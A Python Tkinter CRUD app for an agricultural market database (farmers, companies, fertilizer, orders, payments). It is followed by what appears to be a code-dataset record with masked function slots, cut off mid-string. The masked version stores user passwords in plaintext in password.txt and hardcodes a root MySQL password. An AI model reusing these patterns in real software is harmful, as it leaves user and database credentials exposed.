def delete_pay_command():
try:
sql="DELETE FROM payment WHERE trans_id=%s;"
cur.execute(sql,[e1.get()])
db.commit()
payment()
except:
l=Label(root,text='Invalid Entry',font=('times new roman',15))
l.place(x=100,y=300)
def update_pay():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window
label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=update_pa)
Button.place(x=300, y=400)
def update_pa():
try:
global e1,e2,e3,e4,e5,e6
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
sql='SELECT * FROM payment WHERE trans_id=%s;'
vals=[e1.get()]
cur.execute(sql,vals)
label=Label(root,text='Transaction Id',font=('Times new roman',20),bg='white')
label.place(x=50,y=10)
label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')
label.place(x=50,y=60)
label=Label(root,text='Transaction date',font=('Times new roman',20),bg='white')
label.place(x=50,y=110)
label=Label(root,text='Transaction amount',font=('Times new roman',20),bg='white')
label.place(x=50,y=160)
label=Label(root,text='Transaction method',font=('Times new roman',20),bg='white')
label.place(x=50,y=210)
e1=Entry(root)
e2=Entry(root)
e3=Entry(root)
e4=Entry(root)
e5=Entry(root)
#e6=Entry(root)
data=cur.fetchall()
arr=[e1,e2,e3,e4,e5,e6]
count=0
for val in data[0]:
if count==5:
continue
arr[count].insert(0,val)
count+=1
e1.place(x=350,y=10)
e2.place(x=350,y=60)
e3.place(x=350,y=110)
#e3.insert(0,datetime.now())
e4.place(x=350,y=160)
#e5.place(x=350,y=210)
#e6.place(x=350,y=270)
e5 = StringVar(root)
e5.set("Debit card") # default value
w= OptionMenu(root, e5, "Credit Card", "UPI", "Cheque","Cash")
w.place(x=350,y=210)
label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_pay)
label.place(x=300,y=400)
except:
l=Label(root,text='Invalid Order_id',font=('times new roman',15))
l.place(x=100,y=300)
update_pay()
def update_command_pay():
sql="UPDATE payment SET p_f_id=%s,p_date=%s,p_amount=%s,p_method=%s WHERE trans_id=%s;"
vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()
cur.executemany(sql,[vals])
db.commit()
payment()
def search_pay():
global e1
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
#window2
label=Label(root,text='Transaction Id:',font=('Times new roman',20),bg='tomato')
label.place(x=100,y=200)
e1=Entry(root,width=50)
e1.place(x=300,y=200)
Button = tk.Button(root, text="Back", font=("Arial", 15),command=payment)
Button.place(x=200, y=400)
Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_pa)
Button.place(x=400, y=400)
def search_pa():
#clean
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
label.place(x=0,y=0)
try:
sql='SELECT * FROM payment WHERE trans_id=%s;'
val=[e1.get()]
cur.execute(sql,val)
Button = tk.Button(root, text="OK", font=("Arial", 15),command=payment)
Button.place(x=300, y=400)
for val in cur:
count=0
Y=50
names=['Transaction Id: ','Transaction fid: ','Transaction date: ','Transaction amount: ','Transaction method: ']
for i in val:
label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')
label.place(x=10,y=Y)
Y+=50
count+=1
db.commit()
except:
l=Label(root,text='Invalid order id',font=('times new roman',15))
l.place(x=100,y=300)
search_pay()
First_page(root)
root.mainloop()
|
flexible
|
{
"blob_id": "9f3fcc6e097e37479e3ccf1385f20d70d7c3b6c7",
"index": 8228,
"step-1": "<mask token>\n\n\ndef First_page(root):\n global T1, T2, T3\n frame = Frame(root, height=500, width=800, bg='ivory')\n frame.pack()\n label = Label(root, text='WELCOME TO AGRI MARKET', font=(\n 'Times new roman', 25))\n label.place(x=200, y=50)\n button = Button(root, text='LogIn', font=('times new roman', 20),\n command=check_pass, bg='green')\n button.place(x=350, y=350)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=280, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=280, y=250)\n reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=\n 'blue', command=create_pass)\n reg_button.place(x=340, y=400)\n\n\n<mask token>\n\n\ndef create_pass():\n global root, T1, T2, T3\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=380, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=380, y=250)\n L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),\n bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width=30, show='*', bd=5)\n T3.place(x=380, y=300)\n reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=\n 'blue', command=add_pass)\n reg_button.place(x=440, y=400)\n\n\ndef add_pass():\n global root, T1, T2, T3\n if T2.get() != T3.get():\n label = Label(root, text='Incorrect Password. Enter again', font=(\n 'times new roman', 20))\n label.place(x=100, y=100)\n else:\n try:\n with open('password.txt', 'r') as f:\n data = f.read()\n with open('password.txt', 'w') as f:\n f.write(data + '\\n')\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n except:\n with open('password.txt', 'w') as f:\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n\n\ndef entity_page():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n label = Label(root, text='WELCOME TO AGRI MARKET ', font=(\n 'Times new roman', 20), bg='blue')\n label.place(x=200, y=20)\n label = Label(root, text='Choose the Entity ', font=('Times new roman',\n 20), bg='white')\n label.place(x=250, y=100)\n Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer\n )\n Button.place(x=100, y=150 + 25)\n Button = tk.Button(root, text='Company', font=('Arial', 15), command=\n company)\n Button.place(x=300, y=150 + 25)\n Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command\n =fertilizer)\n Button.place(x=500, y=150 + 25)\n Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)\n Button.place(x=200, y=300 + 25)\n Button = tk.Button(root, text='Payment', font=('Arial', 15), command=\n payment)\n Button.place(x=400, y=300 + 25)\n Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),\n command=history)\n Button.place(x=200, y=400 + 25)\n\n\ndef history():\n global root, cur, db\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])\n data = cur.fetchall()\n label = Label(root, text='The Transaction History of this month', font=\n ('Arial', 15))\n label.place(x=200, y=20)\n button = Button(root, text='BACK', command=entity_page)\n button.place(x=20, y=20)\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n db.close()\n db = mysql.connector.connect(host='localhost', user='root', passwd=\n 'bhushi', database='farmer_app')\n cur = db.cursor()\n\n\n<mask token>\n\n\ndef view_farmer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',\n 'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id', text='Farmer Id')\n table.heading('f_name', text='Farmer Name')\n table.heading('f_phone', text='Farmer Phone')\n table.heading('f_mail', text='Farmer Mail')\n table.heading('f_locality', text='Farmer Locality')\n table.heading('f_address', text='Farmer Address')\n table['show'] = 'headings'\n table.column('f_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM farmer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_farmer():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e6 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_farmer_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef invalid(page):\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n if page == 'farmer':\n label = Label(root, text='Enter valid farmer_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_farmer)\n button.place(x=300, y=400)\n elif page == 'company':\n label = Label(root, text='Enter valid company_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_company)\n button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef delete_farmer_command():\n try:\n sql = 'DELETE FROM farmer WHERE f_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n farmer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)\n Button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef update_command():\n try:\n sql = (\n 'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n update_farmer()\n\n\ndef search_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)\n Button.place(x=400, y=400)\n\n\ndef search():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',\n 'farmer mail: ', 'farmer locality: ', 'farmer address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_farmer()\n\n\ndef company():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_company)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_company)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_company)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_company)\n Button.place(x=410, y=50)\n view_company()\n\n\ndef view_company():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),\n xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id', text='Company Id')\n table.heading('c_name', text='Company Name')\n table.heading('c_address', text='Company Address')\n table['show'] = 'headings'\n table.column('c_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM company;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\ndef insert_company():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company_id', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_company_command)\n Button.place(x=400, y=400)\n\n\ndef insert_company_command():\n try:\n if len(e1.get()) > 3:\n invalid('company')\n else:\n sql = 'INSERT INTO company values(%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get()\n cur.executemany(sql, [vals])\n db.commit()\n company()\n except:\n insert_company()\n\n\ndef delete_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql = 'DELETE FROM company WHERE c_id=%s;'\n cur.execute(sql, [int(e1.get())])\n db.commit()\n company()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_c():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Company_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_c)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_company()\n\n\n<mask token>\n\n\ndef search_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_c)\n Button.place(x=400, y=400)\n\n\ndef search_c():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=company\n )\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['company id: ', 'company name: ', 'company address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Company Id', font=('times new roman', 15)\n )\n l.place(x=100, y=300)\n search_company()\n\n\n<mask token>\n\n\ndef view_fer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',\n 'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.\n set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('fe_formula', text='Fertilizer Formula')\n table.heading('fe_name', text='Fertilizer name')\n table.heading('fe_content', text='Fertilizer content')\n table.heading('fe_price', text='Fertilizer price')\n table.heading('company_id', text='Company_id')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM fertilizer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_fer_command():\n try:\n sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\n\n\ndef delete_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_fer_command():\n try:\n sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n fertilizer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)\n Button.place(x=300, y=400)\n\n\ndef update_fe():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Fertlizer formula', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Fertlizer name', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Fertlizer content', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Fertlizer price', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='comapny_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_fe)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_fer()\n\n\n<mask token>\n\n\ndef search_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fe)\n Button.place(x=400, y=400)\n\n\ndef search_fe():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['fertilizer formula: ', 'fertilizer name: ',\n 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Fertilizer formula', font=(\n 'times new roman', 15))\n l.place(x=100, y=300)\n search_fer()\n\n\ndef orders():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Orders Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_ord)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_ord)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_ord)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_ord)\n Button.place(x=410, y=50)\n view_ord()\n\n\ndef view_ord():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',\n 'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand\n =y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id', text='Order Id')\n table.heading('or_date', text='Order Date')\n table.heading('or_fid', text='Ordered Farmer Id')\n table.heading('or_formula', text='Order (item)formula')\n table.heading('or_to', text='Order to')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM orders;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_ord():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Order date', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order FID', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e2.insert(0, datetime.now())\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_ord_command)\n Button.place(x=400, y=400)\n\n\ndef insert_ord_command():\n try:\n sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n except:\n insert_ord()\n\n\ndef delete_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql = 'DELETE FROM orders WHERE or_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n orders()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_or():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Order Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Order Date', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order f_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', 